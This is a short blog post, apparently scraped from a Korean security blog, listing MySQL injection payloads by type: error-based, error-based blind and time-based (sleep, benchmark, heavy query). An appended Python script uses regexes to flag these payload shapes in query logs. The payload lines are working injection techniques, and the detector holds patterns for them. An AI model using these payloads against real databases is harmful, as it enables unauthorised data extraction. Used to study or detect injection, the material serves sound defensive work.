Source: http://hellsonic.tistory.com/entry/Error-Based-MYSQL-Injection
Error Based MYSQL Injection
mysql> select 1 from dual where 1=1 and row(1,1)>(select count(*),concat(version(),floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1);
mysql> select 1 from dual where 1=1 and ExtractValue(1,concat(0x01,version()));
mysql> select 1 from dual where 1=1 and UpdateXML(1,concat(0x01,version()),1);
Error Based Blind MYSQL Injection
mysql> select 1 from dual where 1=1 and 1=(select 1 union select 1 order by (select 1 from information_schema.tables where 1=1));
mysql> select 1 from dual where 1=1 and if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select 1 from dual where 1=1 and if(1=1,1,(select 1 union select 2));
+---+
mysql> select 1 from dual where 1=2 and (select 1 union select 2);
mysql> select 1 from dual where 1=1 and (select 1 union select 2);
Time Based MYSQL Injection
SLEEP
mysql> select 1 from dual where 1=1 and IF(1=1,sleep(3),0);
mysql> select 1 from dual where 1=1 and IF(1=2,sleep(3),0);
BENCHMARK
mysql> select 1 from dual where 1=1 and IF(1=1,benchmark(1000000,MD5(0)),1);
mysql> select 1 from dual where 1=1 and IF(1=2,benchmark(1000000,MD5(0)),1);
HEAVY QUERY
mysql> select 1 from dual where 1=1 and (select count(*) from information_schema.columns A,information_schema.columns A2,information_schema.columns A3);
mysql> select 1 from dual where 1=2 and (select count(*) from information_schema.columns A,information_schema.columns A2,information_schema.columns A3);
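Added example (not from the original post): a Python triage pass that flags the error-based and time-based statement shapes listed above when they show up in logged SQL. The signature labels, the posts table and the sample log lines are constructed for illustration.

```python
import re

# Heuristic signatures for the query shapes on this page (labels are this example's own).
SIGNATURES = [
    ("error:xpath", re.compile(r"\b(extractvalue|updatexml)\s*\(.*?\bconcat\s*\(", re.I)),
    ("error:group-by-rand", re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b", re.I)),
    ("error:row-count-subquery", re.compile(r"\bif\s*\(.*\(\s*select\s+\d+\s+union\s+select\s+\d+\s*\)", re.I)),
    ("time:sleep", re.compile(r"\bsleep\s*\(\s*\d", re.I)),
    ("time:benchmark", re.compile(r"\bbenchmark\s*\(\s*\d+\s*,", re.I)),
    ("time:heavy-query", re.compile(r"(information_schema\.columns\b[^,;]*,\s*){2,}information_schema\.columns", re.I)),
]

def normalize(sql):
    """Undo comment and whitespace padding before matching."""
    sql = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", sql, flags=re.S)  # MySQL executes /*!NNNNN ... */ bodies
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)            # plain comments act as whitespace
    return re.sub(r"\s+", " ", sql).strip()

def classify(sql):
    """Return the label of every signature the statement matches."""
    text = normalize(sql)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def scan(statements):
    """Map statement index -> labels, for statements with at least one hit."""
    return {i: hits for i, s in enumerate(statements) if (hits := classify(s))}

# Constructed sample: statements as they might appear in a query log.
# Table and column names are invented; the appended conditions are forms listed above.
SAMPLE_LOG = [
    "SELECT id, title FROM posts WHERE id = 7",
    "SELECT id FROM posts WHERE id = 7 and ExtractValue(1,concat(0x01,version()))",
    "SELECT id FROM posts WHERE id = 7 and IF(1=1,sleep(3),0)",
    "SELECT id FROM posts WHERE id = 7 and IF(1=1,benchmark(1000000,MD5(0)),1)",
    "SELECT id FROM posts WHERE id = 7 and if(1=2,1,(select 1 union select 2))",
    "SELECT body FROM posts WHERE body LIKE '%sleep well%'",
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LOG).items():
        print(idx, labels, SAMPLE_LOG[idx])
```

The patterns also match inside string literals, so a hit is a triage signal to correlate with ERROR 1242 responses or unusually slow statements, not proof of injection.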